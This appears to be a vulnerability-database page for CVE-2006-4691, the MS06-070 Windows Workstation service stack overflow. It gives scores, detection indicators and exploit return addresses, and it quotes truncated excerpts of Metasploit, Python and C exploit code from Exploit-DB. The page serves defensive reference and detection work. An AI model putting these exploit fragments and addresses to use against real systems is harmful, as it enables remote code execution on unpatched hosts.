CVE-2006-4691
published 2006-11-14CVE-2006-4691: Stack-based buffer overflow in the NetpManageIPCConnect function in the Workstation service (wkssvc.dll) in Microsoft Windows 2000 SP4 and XP SP2 allows remote…
PriorityP267critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
80.21%
99.6th percentile
Stack-based buffer overflow in the NetpManageIPCConnect function in the Workstation service (wkssvc.dll) in Microsoft Windows 2000 SP4 and XP SP2 allows remote attackers to execute arbitrary code via NetrJoinDomain2 RPC messages with a long hostname.
Detection & IOCsextracted from sources · hover to see the quote
- →Detect oversized NetrJoinDomain2 RPC requests (opnum 0x16) over the \pipe\wkssvc named pipe on SMB port 445; a long hostname/domain parameter indicates exploitation of CVE-2006-4691. ↗
- →Look for the NOP sled pattern (repeated \x90\x90) of over 1000 bytes embedded within a NetrJoinDomain2 RPC request payload as a shellcode delivery indicator. ↗
- →Monitor for SMB connections to IPC$ share followed by opening of the \wkssvc named pipe from external/untrusted hosts, which is the attack transport channel. ↗
- →Flag use of known exploit return addresses in memory regions associated with ws2help.dll (0x75022ac4), ws2_32.dll (0x71ab21cd), user32.dll (0x77E11627), or ntdll.dll (0x77f81573 / 0x77F92A9B) appearing in RPC stub data. ↗
- →Machines already joined to a domain are not exploitable; unenrolled Windows 2000 SP4 and XP SP2 hosts with port 445 exposed are the primary targets. ↗
- ·Windows XP SP2 exploitation requires Administrator credentials to reach the vulnerable code path, making it harder to exploit remotely without prior credential access. ↗
- ·Exploitation requires a valid, live Windows domain name to be specified; the exploit will fail without a reachable domain controller responding to LDAP/DNS queries. ↗
- ·The exploit shellcode and return addresses differ between exploit variants and target OS versions (Win2000 SP4 vs XP SP0/SP1); detection signatures should cover multiple shellcode byte sequences. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Workstation Service - NetpManageIPCConnect Overflow (MS06-070) (Metasploit)
exploitdb·2010-10-05
CVE-2006-4691 Microsoft Workstation Service - NetpManageIPCConnect Overflow (MS06-070) (Metasploit)
Microsoft Workstation Service - NetpManageIPCConnect Overflow (MS06-070) (Metasploit)
---
##
# $Id: ms06_070_wkssvc.rb 10554 2010-10-05 19:29:10Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Workstation Service NetpManageIPCConnect Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect
function using the Workstation service in Windows 2000 SP4 and Windows XP SP2.
In order to exploit this vulnerability, you must specify a the name of a
valid Windows DOMAIN. It m
Exploit-DB
Microsoft Windows - 'NetpManageIPCConnect' Remote Stack Overflow (MS06-070)
exploitdb·2006-11-18
CVE-2006-4691 Microsoft Windows - 'NetpManageIPCConnect' Remote Stack Overflow (MS06-070)
Microsoft Windows - 'NetpManageIPCConnect' Remote Stack Overflow (MS06-070)
---
#!/usr/bin/python
# MS06-070 Windows WorkStation NetpManageIPCConnect Vulnerability Exploit
# Tested on windows 2000 server SP4
#
# Usage: python NetAPI-NetrJoinDomain2.py
# Requires a domain controller on the network (configure samba as DC)
# Requires python and impacket
#
# Winny M Thomas ;-)
from impacket.dcerpc import transport
from impacket import uuid
import sys
import socket
import struct
def DCEconnectAndExploit(target, domain):
baselen = 3708
stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]"
stringbinding %= {'host': target,'pipe': 'wkssvc','port': 445,}
print 'Connecting to named pipe (wkssvc)'
trans = transport.DCERPCTransportFactory(stringbinding)
trans.connect()
print 'Setting up DCE tra
Exploit-DB
Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070)
exploitdb·2006-11-17
CVE-2006-4691 Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070)
Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070)
---
/***************************************************************************
Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit
by cocoruder(frankruder_at_hotmail.com),2006.11.15
page:http://ruder.cdut.net/default.asp
Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to
correct jmp EBX address and fixed exploit output status.
Greetz to InTel
Should work on Windows 2000 Server SP4 (All Languages)
usage:
ms06070 targetip DomainName
notice:
Make sure the DomainName is valid and live,more informations see
http://research.eeye.com/html/advisories/published/AD20061114.html,
cocoruder just research the vulnerability and give the exploit for
Win2000.
********************
Exploit-DB
Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)
exploitdb·2006-11-16
CVE-2006-4691 Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)
Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)
---
/***************************************************************************
Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit
by cocoruder(frankruder_at_hotmail.com),2006.11.15
page:http://ruder.cdut.net/default.asp
successfully test on Windows 2000 Server SP4(chinese)
usage:
ms06070 targetip DomainName
notice:
Make sure the DomainName is valid and live,more informations see
http://research.eeye.com/html/advisories/published/AD20061114.html,
cocoruder just research the vulnerability and give the exploit for
Win2000.
****************************************************************************/
#include
#include
#include
#include
unsigned char SmbNeg[] =
"\x00\x00\x00\x2f\xff\x53\x4d\x4
Metasploit
MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
metasploit
MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect function using the Workstation service in Windows 2000 SP4 and Windows XP SP2. In order to exploit this vulnerability, you must specify the name of a valid Windows DOMAIN. It may be possible to satisfy this condition by using a custom DNS and LDAP setup, however that method is not covered here. Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator credentials are required to reach the vulnerable code. Windows XP SP1 only requires valid user credentials. Also, testing shows that a machine already joined to a domain is not exploitable.
No writeups or analysis indexed.
http://research.eeye.com/html/advisories/published/AD20061114.htmlhttp://secunia.com/advisories/22883http://securitytracker.com/id?1017221http://www.kb.cert.org/vuls/id/778036http://www.securityfocus.com/archive/1/451588/100/0/threadedhttp://www.securityfocus.com/bid/20985http://www.us-cert.gov/cas/techalerts/TA06-318A.htmlhttp://www.vupen.com/english/advisories/2006/4508https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-070https://exchange.xforce.ibmcloud.com/vulnerabilities/29948https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A607https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A908http://research.eeye.com/html/advisories/published/AD20061114.htmlhttp://secunia.com/advisories/22883http://securitytracker.com/id?1017221http://www.kb.cert.org/vuls/id/778036http://www.securityfocus.com/archive/1/451588/100/0/threadedhttp://www.securityfocus.com/bid/20985http://www.us-cert.gov/cas/techalerts/TA06-318A.htmlhttp://www.vupen.com/english/advisories/2006/4508https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-070https://exchange.xforce.ibmcloud.com/vulnerabilities/29948https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A607https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A908
2006-11-14
Published